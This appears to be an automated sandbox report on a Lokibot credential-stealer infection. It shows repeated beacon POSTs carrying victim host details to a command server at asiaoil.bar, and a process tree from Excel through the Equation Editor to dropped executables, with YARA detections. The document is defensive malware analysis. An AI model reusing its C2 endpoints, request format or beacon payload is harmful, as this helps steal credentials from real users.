                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:23.156311989 CET441OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:23.219130993 CET441INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wh%2FHtCJ%2F5r2bJkgiHao050klrqU1roeJfG%2B4i6f3I%2FKeYPkYarG1akcmrjP1MjieW7NO3IUngd6ffdEn3ApGf%2BloKJJBXuiDKbgTzbof4laU14sUbhPRo%2BZeW2t2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44745a96792b9-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        74192.168.2.2249240172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:25.193411112 CET442OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:25.209836006 CET443OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:25.303853035 CET443INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ZOuSqnAuokRLt6j%2BaPucUYURpspSs5959QwqxEaaI65vhxihU%2BSGTldehqd66BkHEec1wRdP8eKXsiuAfROg4bLz4JgpMIkfQ1aSuC9Jn%2BKCRCMyVVG8exy0%2Ffc7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447528eb59094-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        75192.168.2.2249241104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:26.759434938 CET444OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:26.775861025 CET444OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:26.868480921 CET445INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jDOcGscIXoe9amgDgblodsrhn0vmrU90jrXpu8eubmt%2FtVJmc0fEBfOASTLuxQbUt3Vyn6AzRV98aodD8X4wZ0aRqf1etGTdsv2KXeP8MDKpOfZ2KmYTIdqKCEQiTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4475c4e69691b-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        76192.168.2.2249242104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:27.802325010 CET446OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:27.818645954 CET446OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:27.877187014 CET447INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:27 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2nROjTYrKHq5Dp3zfqoq%2BF08OA0sabm52jF3F7aFN8zXdi%2BsX6Cq%2F1PGMTUNOdZpDBwGOKpy%2F6346z2Ex7OMyy0ds2Scyrm%2B5L4uaz1G2nfp7WA5GPCq2oiQAJpM6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44762ced16963-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        77192.168.2.2249243172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:28.801702023 CET448OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:28.817922115 CET448OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:28.894922972 CET449INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:28 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d88FAJAIS01MD7fqAfBFKZ2BhmJxCoOv1Hl6%2FrHHy0nAp1VZ0UmTp2mncxvNOP61QK0xudgAXXNSW%2FHEuL5DLwigS1D%2BHfHJsx5oxzhN7qOtYp8JjADI7dRG6jZTLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447690f816969-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        78192.168.2.2249244172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:29.791358948 CET449OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:29.808893919 CET450OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:29.883049011 CET450INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y4ckWSdyfKKgK%2FaSnEtfcnQkctDbfArW85YmMzuF2GYtn1Vk9z3zezqrAQm97NN4dlNgg4mlDR6cFowQrcAInwiWKaPPKhv22VNGu%2Fi7%2FjbZEoNLKbqtK0TOhixPTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4476f3c7c9072-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        79192.168.2.2249245172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:30.804450989 CET451OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:30.822309017 CET451OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:30.900362015 CET452INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mk%2F%2ByckUn75h6rICqGx9cpJuG7dAjWTNBLmPAr%2FZWuFMh6m%2Fl%2FaMElHYxT54c74Wcf%2BgX9vcoEDADUlGA5wqWcrwO%2B3jiZphR9HdBO0OgJ1mWc%2FTatA77PboqFA%2F%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447759aa39113-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        8192.168.2.2249173172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:09.274962902 CET325OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:09.292191029 CET325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:09.407815933 CET326INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Es%2BCG1ikpvgB48TpSGLWbDWE4lq9KcFNWoR2DepgSQQlwCDx1lJRGNxwRi%2Fuixs5%2FkJ%2BkDAOwOExmpgG%2BFmlHRat148sW8J8clBcEhbV%2BEh21BpaPsALJP5WpoKTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4457809ea6939-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        80192.168.2.2249246172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:31.841167927 CET453OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:31.857433081 CET453OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:31.928236961 CET454INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lkoFlBzh%2FTvOS8G5hZ5h6dPK6YATM%2FnTao2RMMscPCKdFKdF3yBO98Mj55rUC%2BFjMzMKlTeqOz7aj%2Fqw04UBHUPGJ1ayR49HyEd8ogh8KcYhkHXG20zdKy28pHBuBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4477c0a09694f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        81192.168.2.2249247172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:23:32.863722086 CET455OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:32.880721092 CET455OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:33.037036896 CET456INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6IjZw4UIYZGNBtRkEhw0RzPzggwNQkdD8cEShbMPEDVfqNl1bXjX9XB1t94CL9pCK1%2FBnfmx78Swjpa1RBrVYoWA186HoyYm1jceSa4D8bUv8CTvYDnbykWZ8ANQ%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447827e0d5b92-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        9192.168.2.2249174104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:10.415911913 CET326OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:10.432744980 CET327OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:10.503607035 CET327INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v1xV1eUCMr1RHqWt4LM%2Fv%2BEUgUSXOzGnZmG6dttvsqUD60K11ymXFrl4lyksF6Q7oS%2BhJuNDPXKkgp1NVPUepBFUa%2B45veh4yiZTSSeqWs9tYXq72%2F%2FEXVVMkf5Q8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4457f29af917d-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:10:21:15
                        Start date:10/02/2022
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Imagebase:0x13f770000
                        File size:28253536 bytes
                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:2
                        Start time:10:21:38
                        Start date:10/02/2022
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:4
                        Start time:10:21:40
                        Start date:10/02/2022
                        Path:C:\Users\Public\vbc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\Public\vbc.exe"
                        Imagebase:0x400000
                        File size:295124 bytes
                        MD5 hash:7DF1896047D9647D818080DD17563D92
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low

                        General

                        Target ID:5
                        Start time:10:21:41
                        Start date:10/02/2022
                        Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                        Imagebase:0x8a0000
                        File size:125440 bytes
                        MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Target ID:6
                        Start time:10:21:41
                        Start date:10/02/2022
                        Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                        Imagebase:0x8a0000
                        File size:125440 bytes
                        MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
